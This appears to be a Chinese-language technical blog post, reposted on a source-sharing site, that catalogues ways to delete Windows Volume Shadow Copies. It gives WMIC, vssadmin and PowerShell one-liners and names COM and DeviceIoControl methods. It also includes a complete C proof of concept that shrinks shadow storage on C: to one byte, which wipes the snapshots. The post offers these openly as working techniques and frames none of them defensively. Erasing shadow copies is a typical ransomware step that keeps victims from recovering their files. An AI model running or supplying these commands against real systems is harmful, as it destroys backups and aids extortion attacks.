一、几种系统方式卷影删除
1.1 WMIC
cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='%s'\" delete
1.2 VSSADMIN
vssadmin Delete Shadow /all
1.3 Powershell
Get-WmiObject Win32_ShadowCopy| % {$_.Delete()}
Get-WmiObject Win32_ShadowCopy | Remove-WmiObject
1.4 调整大小为0
vssadmin resize shadowstorage /for=<backed volume>/on=<backup location volume> /maxsize=<new size>
二、代码实现
2.1 COM对象删除卷影
IVssBackupComponents::DeleteSnapshots
2.2 COM对象修改大小为0
IVssDifferentialSoftwareSnapshotMgmt::ChangeDiffAreaMaximumSize
2.3 DeviceIoControl删除卷影
发送IOCTL_VOLSNAP_DELETE_SNAPSHOT删除卷影
2.4 DeviceIoControl修改大小为0
发送IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE调整卷影大小
#include <Windows.h> #include <tchar.h> typedef struct _DIFF_AREA_SIZES { LONGLONG UsedSpace; //value used for querying only LONGLONG AllocatedSpace; //value used for querying only LONGLONG MaximumSpace; //0 means UNBOUNDED } DIFF_AREA_SIZES, *PDIFF_AREA_SIZES; #define IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE 0x53c028 //type=0x53, function=0xc, method=METHOD_BUFFERED, Access=(FILE_READ_ACCESS | FILE_WRITE_ACCESS) DWORD dwBRet; DIFF_AREA_SIZES diffAreaSize; TCHAR* tszVolumePath = _T("\\\\.\\C:"); //hardcoded, but perfectly enough for a PoC HANDLE hVolume; int _tmain(int argc, _TCHAR** argv) { diffAreaSize.UsedSpace = 0; //unused anyway diffAreaSize.AllocatedSpace = 0; //unused anyway diffAreaSize.MaximumSpace = 1; //set to 1 byte of snapshot storage _tprintf(_T("Calling CreateFile()...\r\n")); hVolume = CreateFile( tszVolumePath, FILE_GENERIC_READ | FILE_GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); _tprintf(TEXT("CreateFile() returned %i\r\n"), GetLastError()); if (INVALID_HANDLE_VALUE == hVolume) { return GetLastError(); } _tprintf(_T("Calling DeviceIoControl()...\r\n")); DeviceIoControl( hVolume, IOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE, &diffAreaSize, sizeof(diffAreaSize), NULL, 0, &dwBRet, NULL ); _tprintf(_T("DeviceIoControl() returned %i\r\n"), GetLastError()); CloseHandle(hVolume); return GetLastError(); }
View Code
三、参考
https://www.freebuf.com/articles/system/239560.html
原文地址:http://www.cnblogs.com/ciyze0101/p/16901841.html
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,请务用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员!
8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载
声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性